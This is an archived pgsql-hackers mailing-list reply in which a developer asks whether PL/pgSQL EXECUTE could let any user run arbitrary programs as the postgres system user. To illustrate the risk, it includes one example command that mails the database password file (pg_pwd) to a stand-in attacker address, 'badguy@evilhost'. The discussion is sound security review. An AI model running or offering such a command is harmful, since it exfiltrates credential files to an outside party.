Re: Security hole in PL/pgSQL

Поиск
Список
Период
Сортировка
От KuroiNeko
Тема Re: Security hole in PL/pgSQL
Дата
Msg-id 3A75A072.nail2N52XPYU6@ed.ed
обсуждение исходный текст
Ответ на Security hole in PL/pgSQL  (Jan Wieck <janwieck@Yahoo.com>)
Ответы Re: Security hole in PL/pgSQL  ("Dominic J. Eidson" <sauron@the-infinite.org>)
Re: Security hole in PL/pgSQL  (Jan Wieck <janwieck@Yahoo.com>)
Список pgsql-hackers
> Huh? This would only be true if all operations inside plpgsql are
> executed as superuser, which they are not. Seems to me the existing
> defense against non-superuser using COPY is sufficient.
Sorry if I missed the point, but  if I got it right, Pl/Pgsql EXECUTE will
allow execution of any program via exec*() call? If so, this will allow any
(system) user to  execute arbitrary code as postgres  (system) user, right?
If so, how can something like

EXECUTE '/bin/mail badguy@evilhost < /usr/pgsql/data/pg_pwd';
be avioded?


--
������������������



В списке pgsql-hackers по дате отправления:

Предыдущее
От: Tatsuo Ishii
Дата:
Сообщение: Re: Open 7.1 items
Следующее
От: Tatsuo Ishii
Дата:
Сообщение: Re: Open 7.1 items